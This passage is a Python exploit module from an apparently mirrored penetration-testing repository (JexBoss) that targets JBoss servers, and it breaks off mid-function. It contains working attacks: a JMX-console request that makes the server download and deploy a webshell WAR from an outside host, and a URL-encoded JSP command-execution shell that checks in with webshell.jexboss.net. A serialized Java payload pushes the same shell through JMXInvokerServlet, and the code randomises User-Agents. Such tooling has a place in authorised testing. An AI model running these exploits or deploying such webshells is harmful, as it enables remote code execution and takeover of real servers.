github
/
PenetrationTestingScripts
mirror of https://github.com/ym2011/PenetrationTestingScripts
1
0
Fork 0
Code Issues Projects Releases Wiki Activity
PenetrationTestingScripts/Jboss_Verify_EXploitation/_exploits.py

556 lines
37 KiB
Python
Raw Blame History

# -*- coding: utf-8 -*-
"""
Module to group exploits of the JexBoss
https://github.com/joaomatosf/jexboss
Copyright 2013 João Filho Matos Figueiredo
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from jexboss import *
from random import randint
import urllib
from sys import version_info
if version_info[0] >= 3:
from urllib.parse import quote
def exploit_jmx_console_main_deploy(url):
"""
Exploit MainDeployer to deploy a JSP shell. Does not work in JBoss 5 (bug in JBoss 5).
/jmx-console/HtmlAdaptor
:param url: The url to exploit
:return: The HTTP status code
"""
if not 'http' in url[:4]:
url = "http://"+url
jsp = "http://www.joaomatosf.com/rnp/jexws3.war"
payload = ("/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service="
"MainDeployer&methodIndex=19&arg0="+jsp)
print(GREEN + "\n * Info: This exploit will force the server to deploy the webshell " +
"\n available at: " + jsp + ENDC)
headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Connection": "keep-alive",
"User-Agent": user_agents[randint(0, len(user_agents) - 1)]}
pool.request('HEAD', url + payload, redirect=False, headers=headers)
return get_successfully(url, "/jexws3/jexws3.jsp")
def exploit_jmx_console_file_repository(url):
"""
Exploit DeploymentFileRepository to deploy a JSP shell
Tested and working in JBoss 4, 5. Does not work in JBoss 6.
/jmx-console/HtmlAdaptor
:param url: The URL to exploit
:return: The HTTP status code
"""
jsp = ("%3C%25%40%20%70%61%67%65%20%69%6D%70%6F%72%74%3D%22%6A%61%76%61%2E%75%74%69%6C%2E%2A"
"%2C%6A%61%76%61%2E%69%6F%2E%2A%2C%20%6A%61%76%61%2E%6E%65%74%2E%2A%22%20%70%61%67%65%45"
"%6E%63%6F%64%69%6E%67%3D%22%55%54%46%2D%38%22%25%3E%20%3C%70%72%65%3E%20%3C%25%20%69%6E"
"%74%20%76%65%72%73%69%6F%6E%20%3D%20%33%3B%20%69%66%20%28%72%65%71%75%65%73%74%2E%67%65"
"%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22%29%20%21%3D%20%6E%75%6C%6C%29%20%7B%20"
"%62%6F%6F%6C%65%61%6E%20%63%68%65%63%6B%55%70%64%61%74%65%73%3B%20%48%74%74%70%55%52%4C"
"%43%6F%6E%6E%65%63%74%69%6F%6E%20%63%6F%6E%6E%43%68%65%63%6B%55%70%64%61%74%65%73%20%3D"
"%20%6E%75%6C%6C%3B%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%20%62%72%20%3D%20%6E%75"
"%6C%6C%3B%20%72%65%73%70%6F%6E%73%65%2E%73%65%74%43%6F%6E%74%65%6E%74%54%79%70%65%28%22"
"%74%65%78%74%2F%68%74%6D%6C%22%29%3B%20%69%66%20%28%72%65%71%75%65%73%74%2E%67%65%74%48"
"%65%61%64%65%72%28%22%63%68%65%63%6B%2D%75%70%64%61%74%65%73%22%29%20%21%3D%20%6E%75%6C"
"%6C%20%26%26%20%72%65%71%75%65%73%74%2E%67%65%74%48%65%61%64%65%72%28%22%63%68%65%63%6B"
"%2D%75%70%64%61%74%65%73%22%29%2E%65%71%75%61%6C%73%28%22%66%61%6C%73%65%22%29%29%7B%20"
"%63%68%65%63%6B%55%70%64%61%74%65%73%20%3D%20%66%61%6C%73%65%3B%20%7D%65%6C%73%65%20%7B"
"%20%63%68%65%63%6B%55%70%64%61%74%65%73%20%3D%20%74%72%75%65%3B%20%63%6F%6E%6E%43%68%65"
"%63%6B%55%70%64%61%74%65%73%20%3D%20%28%48%74%74%70%55%52%4C%43%6F%6E%6E%65%63%74%69%6F"
"%6E%29%20%6E%65%77%20%55%52%4C%28%22%68%74%74%70%3A%2F%2F%77%65%62%73%68%65%6C%6C%2E%6A"
"%65%78%62%6F%73%73%2E%6E%65%74%2F%6A%73%70%5F%76%65%72%73%69%6F%6E%2E%74%78%74%22%29%2E"
"%6F%70%65%6E%43%6F%6E%6E%65%63%74%69%6F%6E%28%29%3B%20%7D%20%53%74%72%69%6E%67%20%73%68"
"%20%3D%20%72%65%71%75%65%73%74%2E%67%65%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22"
"%29%3B%20%53%74%72%69%6E%67%20%6C%61%73%74%48%6F%75%72%43%68%65%63%6B%20%3D%20%28%6E%65"
"%77%20%44%61%74%65%28%29%2E%74%6F%53%74%72%69%6E%67%28%29%2E%73%70%6C%69%74%28%22%3A%22"
"%29%5B%30%5D%2B%22%68%2E%6C%6F%67%22%29%2E%72%65%70%6C%61%63%65%41%6C%6C%28%22%20%22%2C"
"%20%22%2D%22%29%3B%20%74%72%79%7B%20%69%66%20%28%63%68%65%63%6B%55%70%64%61%74%65%73%20"
"%3D%3D%20%74%72%75%65%29%7B%20%63%6F%6E%6E%43%68%65%63%6B%55%70%64%61%74%65%73%2E%73%65"
"%74%52%65%71%75%65%73%74%50%72%6F%70%65%72%74%79%28%22%55%73%65%72%2D%41%67%65%6E%74%22"
"%2C%20%72%65%71%75%65%73%74%2E%67%65%74%48%65%61%64%65%72%28%22%48%6F%73%74%22%29%2B%22"
"%3C%2D%22%2B%72%65%71%75%65%73%74%2E%67%65%74%52%65%6D%6F%74%65%41%64%64%72%28%29%29%3B"
"%20%69%66%20%28%21%6E%65%77%20%46%69%6C%65%28%22%63%68%65%63%6B%5F%22%2B%6C%61%73%74%48"
"%6F%75%72%43%68%65%63%6B%29%2E%65%78%69%73%74%73%28%29%29%7B%20%50%72%69%6E%74%57%72%69"
"%74%65%72%20%77%72%69%74%65%72%20%3D%20%6E%65%77%20%50%72%69%6E%74%57%72%69%74%65%72%28"
"%22%63%68%65%63%6B%5F%22%2B%6C%61%73%74%48%6F%75%72%43%68%65%63%6B%29%3B%20%77%72%69%74"
"%65%72%2E%63%6C%6F%73%65%28%29%3B%20%62%72%20%3D%20%6E%65%77%20%42%75%66%66%65%72%65%64"
"%52%65%61%64%65%72%28%6E%65%77%20%49%6E%70%75%74%53%74%72%65%61%6D%52%65%61%64%65%72%28"
"%63%6F%6E%6E%43%68%65%63%6B%55%70%64%61%74%65%73%2E%67%65%74%49%6E%70%75%74%53%74%72%65"
"%61%6D%28%29%29%29%3B%20%69%6E%74%20%6C%61%73%74%56%65%72%73%69%6F%6E%20%3D%20%49%6E%74"
"%65%67%65%72%2E%70%61%72%73%65%49%6E%74%28%62%72%2E%72%65%61%64%4C%69%6E%65%28%29%2E%73"
"%70%6C%69%74%28%22%20%22%29%5B%31%5D%29%3B%20%69%66%20%28%6C%61%73%74%56%65%72%73%69%6F"
"%6E%20%3E%20%76%65%72%73%69%6F%6E%29%7B%20%6F%75%74%2E%70%72%69%6E%74%28%22%50%6C%65%61"
"%73%65%20%6E%6F%74%65%3A%20%74%68%65%72%65%20%69%73%20%61%6E%20%75%70%64%61%74%65%20%74"
"%6F%20%4A%65%78%42%6F%73%73%20%4A%53%50%20%57%65%62%73%68%65%6C%6C%2E%20%57%65%20%72%65"
"%63%6F%6D%6D%65%6E%64%20%74%68%61%74%20%79%6F%75%20%72%65%72%75%6E%20%74%68%65%20%4A%65"
"%78%42%6F%73%73%20%74%6F%20%72%65%64%65%70%6C%6F%79%20%74%68%65%20%6E%65%77%20%76%65%72"
"%73%69%6F%6E%20%6F%66%20%77%65%62%73%68%65%6C%6C%20%69%6E%20%4A%42%6F%73%73%20%73%65%72"
"%76%65%72%20%74%65%73%74%65%64%2E%22%29%3B%20%7D%20%7D%20%65%6C%73%65%20%69%66%20%28%73"
"%68%2E%63%6F%6E%74%61%69%6E%73%28%22%69%64%22%29%20%7C%7C%20%73%68%2E%63%6F%6E%74%61%69"
"%6E%73%28%22%69%70%63%6F%6E%66%69%67%22%29%29%20%7B%20%63%6F%6E%6E%43%68%65%63%6B%55%70"
"%64%61%74%65%73%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%3B%20%7D%20%7D%20%7D"
"%20%63%61%74%63%68%28%45%78%63%65%70%74%69%6F%6E%20%65%29%7B%6F%75%74%2E%70%72%69%6E%74"
"%6C%6E%28%22%45%72%72%6F%72%20%63%68%65%63%6B%69%6E%67%20%66%6F%72%20%75%70%64%61%74%65"
"%73%22%29%3B%7D%20%74%72%79%20%7B%20%50%72%6F%63%65%73%73%20%70%3B%20%69%66%20%28%53%79"
"%73%74%65%6D%2E%67%65%74%50%72%6F%70%65%72%74%79%28%22%6F%73%2E%6E%61%6D%65%22%29%2E%74"
"%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%69%6E%64%65%78%4F%66%28%22%77%69%6E%22%29%20%3E"
"%20%30%20%7C%7C%20%21%53%79%73%74%65%6D%2E%67%65%74%50%72%6F%70%65%72%74%79%28%22%66%69"
"%6C%65%2E%73%65%70%61%72%61%74%6F%72%22%29%2E%65%71%75%61%6C%73%28%22%2F%22%29%29%7B%20"
"%70%20%3D%20%52%75%6E%74%69%6D%65%2E%67%65%74%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63"
"%28%22%63%6D%64%2E%65%78%65%20%2F%43%20%22%2B%73%68%29%3B%20%7D%20%65%6C%73%65%20%7B%20"
"%70%20%3D%20%52%75%6E%74%69%6D%65%2E%67%65%74%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63"
"%28%73%68%29%3B%20%7D%20%62%72%20%3D%20%6E%65%77%20%42%75%66%66%65%72%65%64%52%65%61%64"
"%65%72%28%6E%65%77%20%49%6E%70%75%74%53%74%72%65%61%6D%52%65%61%64%65%72%28%70%2E%67%65"
"%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%29%29%3B%20%53%74%72%69%6E%67%20%64%69%73%72"
"%20%3D%20%62%72%2E%72%65%61%64%4C%69%6E%65%28%29%3B%20%77%68%69%6C%65%20%28%64%69%73%72"
"%20%21%3D%20%6E%75%6C%6C%29%20%7B%20%6F%75%74%2E%70%72%69%6E%74%6C%6E%28%64%69%73%72%29"
"%3B%20%64%69%73%72%20%3D%20%62%72%2E%72%65%61%64%4C%69%6E%65%28%29%3B%20%7D%20%7D%63%61"
"%74%63%68%28%45%78%63%65%70%74%69%6F%6E%20%65%29%20%7B%20%6F%75%74%2E%70%72%69%6E%74%6C"
"%6E%28%22%55%6E%6B%6E%6F%77%6E%20%63%6F%6D%6D%61%6E%64%2E%22%29%3B%20%7D%20%7D%20%25%3E")
payload = ("/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service="
"DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0="
"jexws3.war&argType=java.lang.String&arg1=jexws3&argType=java.lang.St"
"ring&arg2=.jsp&argType=java.lang.String&arg3=" + jsp + "&argType=boolean&arg4=True")
headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Connection": "keep-alive",
"User-Agent": user_agents[randint(0, len(user_agents) - 1)]}
pool.request('HEAD', url + payload, redirect=False, headers=headers)
return get_successfully(url, "/jexws3/jexws3.jsp")
def exploit_jmx_invoker_file_repository(url, version):
"""
Exploits the JMX invoker
tested and works in JBoss 4, 5
MainDeploy, shell in data
# /invoker/JMXInvokerServlet
:param url: The URL to exploit
:return:
"""
payload = ("\xac\xed\x00\x05\x73\x72\x00\x29\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e"
"\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d\x61\x72\x73\x68\x61\x6c\x6c"
"\x65\x64\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\xf6\x06\x95\x27\x41\x3e\xa4"
"\xbe\x0c\x00\x00\x78\x70\x70\x77\x08\x78\x94\x98\x47\xc1\xd0\x53\x87\x73\x72"
"\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72"
"\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65"
"\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65"
"\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70")
payload += ("\xe3\x2c\x60\xe6") if version == 0 else ("\x26\x95\xbe\x0a")
payload += (
"\x73\x72\x00\x24\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61"
"\x74\x69\x6f\x6e\x2e\x4d\x61\x72\x73\x68\x61\x6c\x6c\x65\x64\x56\x61\x6c\x75"
"\x65\xea\xcc\xe0\xd1\xf4\x4a\xd0\x99\x0c\x00\x00\x78\x70\x7a\x00\x00\x04\x00"
"\x00\x00\x08\xb4\xac\xed\x00\x05\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e"
"\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29"
"\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x04\x73\x72\x00\x1b\x6a\x61\x76\x61\x78"
"\x2e\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e"
"\x61\x6d\x65\x0f\x03\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00\x78\x70\x74\x00\x2c"
"\x6a\x62\x6f\x73\x73\x2e\x61\x64\x6d\x69\x6e\x3a\x73\x65\x72\x76\x69\x63\x65"
"\x3d\x44\x65\x70\x6c\x6f\x79\x6d\x65\x6e\x74\x46\x69\x6c\x65\x52\x65\x70\x6f"
"\x73\x69\x74\x6f\x72\x79\x78\x74\x00\x05\x73\x74\x6f\x72\x65\x75\x71\x00\x7e"
"\x00\x00\x00\x00\x00\x05\x74\x00\x0b\x6a\x65\x78\x69\x6e\x76\x33\x2e\x77\x61"
"\x72\x74\x00\x07\x6a\x65\x78\x69\x6e\x76\x33\x74\x00\x04\x2e\x6a\x73\x70\x74"
"\x07\x79\x3c\x25\x40\x20\x70\x61\x67\x65\x20\x69\x6d\x70\x6f\x72\x74\x3d\x22"
"\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x2a\x2c\x6a\x61\x76\x61\x2e\x69\x6f"
"\x2e\x2a\x2c\x20\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x2a\x22\x20\x70\x61\x67"
"\x65\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x38\x22\x25\x3e"
"\x20\x3c\x70\x72\x65\x3e\x20\x3c\x25\x20\x69\x6e\x74\x20\x76\x65\x72\x73\x69"
"\x6f\x6e\x20\x3d\x20\x33\x3b\x20\x69\x66\x20\x28\x72\x65\x71\x75\x65\x73\x74"
"\x2e\x67\x65\x74\x50\x61\x72\x61\x6d\x65\x74\x65\x72\x28\x22\x70\x70\x70\x22"
"\x29\x20\x21\x3d\x20\x6e\x75\x6c\x6c\x29\x20\x7b\x20\x62\x6f\x6f\x6c\x65\x61"
"\x6e\x20\x63\x68\x65\x63\x6b\x55\x70\x64\x61\x74\x65\x73\x3b\x20\x48\x74\x74"
"\x70\x55\x52\x4c\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x20\x63\x6f\x6e\x6e"
"\x43\x68\x65\x63\x6b\x55\x70\x64\x61\x74\x65\x73\x20\x3d\x20\x6e\x75\x6c\x6c"
"\x3b\x20\x42\x75\x66\x66\x65\x72\x65\x64\x52\x65\x61\x64\x65\x72\x20\x62\x72"
"\x20\x3d\x20\x6e\x75\x6c\x6c\x3b\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x2e\x73"
"\x65\x74\x43\x6f\x6e\x74\x65\x6e\x74\x54\x79\x70\x65\x28\x22\x74\x65\x78\x74"
"\x2f\x68\x74\x6d\x6c\x22\x29\x3b\x20\x69\x66\x20\x28\x72\x65\x71\x75\x65\x73"
"\x74\x2e\x67\x65\x74\x48\x65\x61\x64\x65\x72\x28\x22\x63\x68\x65\x63\x6b\x2d"
"\x75\x70\x64\x61\x74\x65\x73\x22\x29\x20\x21\x3d\x20\x6e\x75\x6c\x6c\x20\x26"
"\x26\x20\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x48\x65\x61\x64\x65\x72"
"\x28\x22\x63\x68\x65\x63\x6b\x2d\x75\x70\x64\x61\x74\x65\x73\x22\x29\x2e\x65"
"\x71\x75\x61\x6c\x73\x28\x22\x66\x61\x6c\x73\x65\x22\x29\x29\x7b\x20\x63\x68"
"\x65\x63\x6b\x55\x70\x64\x61\x74\x65\x73\x20\x3d\x20\x66\x61\x6c\x73\x65\x3b"
"\x20\x7d\x65\x6c\x73\x65\x20\x7b\x20\x63\x68\x65\x63\x6b\x55\x70\x64\x61\x74"
"\x65\x73\x20\x3d\x20\x74\x72\x75\x65\x3b\x20\x63\x6f\x6e\x6e\x43\x68\x65\x63"
"\x6b\x55\x70\x64\x61\x74\x65\x73\x20\x3d\x20\x28\x48\x74\x74\x70\x55\x52\x4c"
"\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x29\x20\x6e\x65\x77\x20\x55\x52\x4c"
"\x28\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x65\x62\x73\x68\x65\x6c\x6c\x2e\x6a"
"\x65\x78\x62\x6f\x73\x73\x2e\x6e\x65\x74\x2f\x6a\x73\x70\x5f\x76\x65\x72\x73"
"\x69\x6f\x6e\x2e\x74\x78\x74\x22\x29\x2e\x6f\x70\x65\x6e\x43\x6f\x6e\x6e\x65"
"\x63\x74\x69\x6f\x6e\x28\x29\x3b\x20\x7d\x20\x53\x74\x72\x69\x6e\x67\x20\x73"
"\x68\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61"
"\x6d\x65\x74\x65\x72\x28\x22\x70\x70\x70\x22\x29\x3b\x20\x53\x74\x72\x69\x6e"
"\x67\x20\x6c\x61\x73\x74\x48\x6f\x75\x72\x43\x68\x65\x63\x6b\x20\x3d\x20\x28"
"\x6e\x65\x77\x20\x44\x61\x74\x65\x28\x29\x2e\x74\x6f\x53\x74\x72\x69\x6e\x67"
"\x28\x29\x2e\x73\x70\x6c\x69\x74\x28\x22\x3a\x22\x29\x5b\x30\x5d\x2b\x22\x68"
"\x2e\x6c\x6f\x67\x22\x29\x2e\x72\x65\x70\x6c\x61\x63\x65\x41\x6c\x6c\x28\x22"
"\x20\x22\x2c\x20\x22\x2d\x22\x29\x3b\x20\x74\x72\x79\x7b\x20\x69\x66\x20\x28"
"\x63\x68\x65\x63\x6b\x55\x70\x64\x61\x74\x65\x73\x20\x3d\x3d\x20\x74\x72\x75"
"\x65\x29\x7b\x20\x63\x6f\x6e\x6e\x43\x68\x65\x63\x6b\x55\x70\x64\x61\x74\x65"
"\x73\x2e\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x50\x72\x6f\x70\x65\x72\x74"
"\x79\x28\x22\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x22\x2c\x20\x72\x65\x71"
"\x75\x65\x73\x74\x2e\x67\x65\x74\x48\x65\x61\x64\x65\x72\x28\x22\x48\x6f\x73"
"\x74\x22\x29\x2b\x22\x3c\x2d\x22\x2b\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65"
"\x74\x52\x65\x6d\x6f\x74\x65\x41\x64\x64\x72\x28\x29\x29\x3b\x20\x69\x66\x20"
"\x28\x21\x6e\x65\x77\x20\x46\x69\x6c\x65\x28\x22\x63\x68\x65\x63\x6b\x7a\x00"
"\x00\x04\x00\x5f\x22\x2b\x6c\x61\x73\x74\x48\x6f\x75\x72\x43\x68\x65\x63\x6b"
"\x29\x2e\x65\x78\x69\x73\x74\x73\x28\x29\x29\x7b\x20\x50\x72\x69\x6e\x74\x57"
"\x72\x69\x74\x65\x72\x20\x77\x72\x69\x74\x65\x72\x20\x3d\x20\x6e\x65\x77\x20"
"\x50\x72\x69\x6e\x74\x57\x72\x69\x74\x65\x72\x28\x22\x63\x68\x65\x63\x6b\x5f"
"\x22\x2b\x6c\x61\x73\x74\x48\x6f\x75\x72\x43\x68\x65\x63\x6b\x29\x3b\x20\x77"
"\x72\x69\x74\x65\x72\x2e\x63\x6c\x6f\x73\x65\x28\x29\x3b\x20\x62\x72\x20\x3d"
"\x20\x6e\x65\x77\x20\x42\x75\x66\x66\x65\x72\x65\x64\x52\x65\x61\x64\x65\x72"
"\x28\x6e\x65\x77\x20\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x52\x65\x61"
"\x64\x65\x72\x28\x63\x6f\x6e\x6e\x43\x68\x65\x63\x6b\x55\x70\x64\x61\x74\x65"
"\x73\x2e\x67\x65\x74\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x29"
"\x29\x3b\x20\x69\x6e\x74\x20\x6c\x61\x73\x74\x56\x65\x72\x73\x69\x6f\x6e\x20"
"\x3d\x20\x49\x6e\x74\x65\x67\x65\x72\x2e\x70\x61\x72\x73\x65\x49\x6e\x74\x28"
"\x62\x72\x2e\x72\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x2e\x73\x70\x6c\x69\x74"
"\x28\x22\x20\x22\x29\x5b\x31\x5d\x29\x3b\x20\x69\x66\x20\x28\x6c\x61\x73\x74"
"\x56\x65\x72\x73\x69\x6f\x6e\x20\x3e\x20\x76\x65\x72\x73\x69\x6f\x6e\x29\x7b"
"\x20\x6f\x75\x74\x2e\x70\x72\x69\x6e\x74\x28\x22\x50\x6c\x65\x61\x73\x65\x20"
"\x6e\x6f\x74\x65\x3a\x20\x74\x68\x65\x72\x65\x20\x69\x73\x20\x61\x6e\x20\x75"
"\x70\x64\x61\x74\x65\x20\x74\x6f\x20\x4a\x65\x78\x42\x6f\x73\x73\x20\x4a\x53"
"\x50\x20\x57\x65\x62\x73\x68\x65\x6c\x6c\x2e\x20\x57\x65\x20\x72\x65\x63\x6f"
"\x6d\x6d\x65\x6e\x64\x20\x74\x68\x61\x74\x20\x79\x6f\x75\x20\x72\x65\x72\x75"
"\x6e\x20\x74\x68\x65\x20\x4a\x65\x78\x42\x6f\x73\x73\x20\x74\x6f\x20\x72\x65"
"\x64\x65\x70\x6c\x6f\x79\x20\x74\x68\x65\x20\x6e\x65\x77\x20\x76\x65\x72\x73"
"\x69\x6f\x6e\x20\x6f\x66\x20\x77\x65\x62\x73\x68\x65\x6c\x6c\x20\x69\x6e\x20"
"\x4a\x42\x6f\x73\x73\x20\x73\x65\x72\x76\x65\x72\x20\x74\x65\x73\x74\x65\x64"
"\x2e\x22\x29\x3b\x20\x7d\x20\x7d\x20\x65\x6c\x73\x65\x20\x69\x66\x20\x28\x73"
"\x68\x2e\x63\x6f\x6e\x74\x61\x69\x6e\x73\x28\x22\x69\x64\x22\x29\x20\x7c\x7c"
"\x20\x73\x68\x2e\x63\x6f\x6e\x74\x61\x69\x6e\x73\x28\x22\x69\x70\x63\x6f\x6e"
"\x66\x69\x67\x22\x29\x29\x20\x7b\x20\x63\x6f\x6e\x6e\x43\x68\x65\x63\x6b\x55"
"\x70\x64\x61\x74\x65\x73\x2e\x67\x65\x74\x49\x6e\x70\x75\x74\x53\x74\x72\x65"
"\x61\x6d\x28\x29\x3b\x20\x7d\x20\x7d\x20\x7d\x20\x63\x61\x74\x63\x68\x28\x45"
"\x78\x63\x65\x70\x74\x69\x6f\x6e\x20\x65\x29\x7b\x6f\x75\x74\x2e\x70\x72\x69"
"\x6e\x74\x6c\x6e\x28\x22\x45\x72\x72\x6f\x72\x20\x63\x68\x65\x63\x6b\x69\x6e"
"\x67\x20\x66\x6f\x72\x20\x75\x70\x64\x61\x74\x65\x73\x22\x29\x3b\x7d\x20\x74"
"\x72\x79\x20\x7b\x20\x50\x72\x6f\x63\x65\x73\x73\x20\x70\x3b\x20\x69\x66\x20"
"\x28\x53\x79\x73\x74\x65\x6d\x2e\x67\x65\x74\x50\x72\x6f\x70\x65\x72\x74\x79"
"\x28\x22\x6f\x73\x2e\x6e\x61\x6d\x65\x22\x29\x2e\x74\x6f\x4c\x6f\x77\x65\x72"
"\x43\x61\x73\x65\x28\x29\x2e\x69\x6e\x64\x65\x78\x4f\x66\x28\x22\x77\x69\x6e"
"\x22\x29\x20\x3e\x20\x30\x20\x7c\x7c\x20\x21\x53\x79\x73\x74\x65\x6d\x2e\x67"
"\x65\x74\x50\x72\x6f\x70\x65\x72\x74\x79\x28\x22\x66\x69\x6c\x65\x2e\x73\x65"
"\x70\x61\x72\x61\x74\x6f\x72\x22\x29\x2e\x65\x71\x75\x61\x6c\x73\x28\x22\x2f"
"\x22\x29\x29\x7b\x20\x70\x20\x3d\x20\x52\x75\x6e\x74\x69\x6d\x65\x2e\x67\x65"
"\x74\x52\x75\x6e\x74\x69\x6d\x65\x28\x29\x2e\x65\x78\x65\x63\x28\x22\x63\x6d"
"\x64\x2e\x65\x78\x65\x20\x2f\x43\x20\x22\x2b\x73\x68\x29\x3b\x20\x7d\x20\x65"
"\x6c\x73\x65\x20\x7b\x20\x70\x20\x3d\x20\x52\x75\x6e\x74\x69\x6d\x65\x2e\x67"
"\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x28\x29\x2e\x65\x78\x65\x63\x28\x73\x68"
"\x29\x3b\x20\x7d\x20\x62\x72\x20\x3d\x20\x6e\x65\x77\x20\x42\x75\x66\x66\x65"
"\x72\x65\x64\x52\x65\x61\x64\x65\x72\x28\x6e\x65\x77\x20\x49\x6e\x70\x75\x74"
"\x53\x74\x72\x65\x61\x6d\x52\x65\x61\x64\x65\x72\x28\x70\x2e\x67\x65\x74\x49"
"\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x29\x29\x3b\x20\x53\x74\x72"
"\x69\x6e\x67\x20\x64\x69\x73\x72\x20\x3d\x20\x62\x72\x2e\x72\x65\x61\x64\x4c"
"\x69\x6e\x65\x28\x29\x3b\x20\x77\x68\x69\x6c\x65\x20\x28\x64\x69\x73\x72\x20"
"\x21\x3d\x20\x6e\x75\x6c\x6c\x29\x20\x7b\x20\x6f\x75\x74\x2e\x70\x72\x69\x6e"
"\x74\x6c\x6e\x28\x64\x69\x73\x72\x29\x3b\x20\x64\x69\x73\x72\x20\x3d\x20\x62"
"\x72\x2e\x72\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x3b\x20\x7d\x20\x7d\x63\x61"
"\x74\x77\xbc\x63\x68\x28\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x20\x65\x29\x20"
"\x7b\x20\x6f\x75\x74\x2e\x70\x72\x69\x6e\x74\x6c\x6e\x28\x22\x55\x6e\x6b\x6e"
"\x6f\x77\x6e\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x2e\x22\x29\x3b\x20\x7d\x20\x7d"
"\x20\x25\x3e\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x42\x6f"
"\x6f\x6c\x65\x61\x6e\xcd\x20\x72\x80\xd5\x9c\xfa\xee\x02\x00\x01\x5a\x00\x05"
"\x76\x61\x6c\x75\x65\x78\x70\x01\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e"
"\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b"
"\x47\x02\x00\x00\x78\x70\x00\x00\x00\x05\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c"
"\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x71\x00\x7e\x00\x0f\x71\x00\x7e\x00"
"\x0f\x71\x00\x7e\x00\x0f\x74\x00\x07\x62\x6f\x6f\x6c\x65\x61\x6e\x21\x96\x59"
"\xec\x78\x77\x08\x00\x00\x00\x00\x00\x00\x00\x01\x73\x72\x00\x22\x6f\x72\x67"
"\x2e\x6a\x62\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x49"
"\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x4b\x65\x79\xb8\xfb\x72\x84\xd7\x93\x85"
"\xf9\x02\x00\x01\x49\x00\x07\x6f\x72\x64\x69\x6e\x61\x6c\x78\x70\x00\x00\x00"
"\x04\x70\x78")
headers = {"Content-Type": "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue",
"Accept": "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",
"Connection": "keep-alive",
"User-Agent": user_agents[randint(0, len(user_agents) - 1)]}
r = pool.urlopen('POST', url + "/invoker/JMXInvokerServlet", redirect=False, headers=headers, body=payload)
result = r.status
if result == 401:
print(" Retrying...")
pool.urlopen('HEAD', url + "/invoker/JMXInvokerServlet", redirect=False, headers=headers, body=payload)
return get_successfully(url, "/jexinv3/jexinv3.jsp")
def exploit_web_console_invoker(url):
"""
Exploits web console invoker
Does not work in JBoss 5 (bug in JBoss5)
:param url: The URL to exploit
:return: The HTTP status code
"""
payload = (
"\xac\xed\x00\x05\x73\x72\x00\x2e\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e"
